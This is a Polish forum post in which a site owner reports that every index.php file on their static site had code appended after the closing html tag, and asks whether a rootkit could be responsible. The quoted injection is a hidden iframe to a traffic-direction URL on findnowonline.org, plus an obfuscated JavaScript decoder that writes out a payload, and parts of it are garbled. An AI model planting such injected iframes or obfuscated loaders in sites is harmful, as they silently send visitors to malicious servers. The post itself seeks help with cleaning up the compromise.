W niewyjasnionych okolicznosciach w kazdym pliku index.php na serwerze na koncu po znaczniku </html> dodany zostal kod:
CODE
<iframe width="167" height="208" style="display: none;" src="http://findnowonline.org/tds/out.php?s_id=1?139605f5abaf5" name="9983">
<html>
<head>
<script language="JavaScript">
1function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,27,21,44,59,5,10,15,50,0,0,0,0,0,
,0,24,60,32,52,8,12,35,26,58,2,29,19,20,39,23,40,45,28,7,30,46,42,4,25,53,31,56,
,0,0,0,48,0,11,41,22,37,38,62,47,14,33,51,9,18,55,54,36,16,49,13,34,1,57,3,43,6,
7,61);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,
;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write®}}decrypt_p("5ebq9gQC9YzenwAXNjri58g8pND4XNDjcNZqkw3qhvQ_aebsxvA8yvAX1I")
</script>
</head>
<body>
<center>Sorry! You IP is blocked.</center>
</body>
</html>
</iframe>
<html>
<head>
<script language="JavaScript">
1function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,27,21,44,59,5,10,15,50,0,0,0,0,0,
,0,24,60,32,52,8,12,35,26,58,2,29,19,20,39,23,40,45,28,7,30,46,42,4,25,53,31,56,
,0,0,0,48,0,11,41,22,37,38,62,47,14,33,51,9,18,55,54,36,16,49,13,34,1,57,3,43,6,
7,61);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,
;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write®}}decrypt_p("5ebq9gQC9YzenwAXNjri58g8pND4XNDjcNZqkw3qhvQ_aebsxvA8yvAX1I")</script>
</head>
<body>
<center>Sorry! You IP is blocked.</center>
</body>
</html>
</iframe>
Strona jest statyczna bez dynamicznie generwowanej zawartosci, php korzystam tylko do includowania menu
nie ma zadnych formularzy zeby mozna bylo zrobic na nich xss. Ktos sie spotkal z czyms takim ? Moze jakis rootkit na serwerze ?
Standard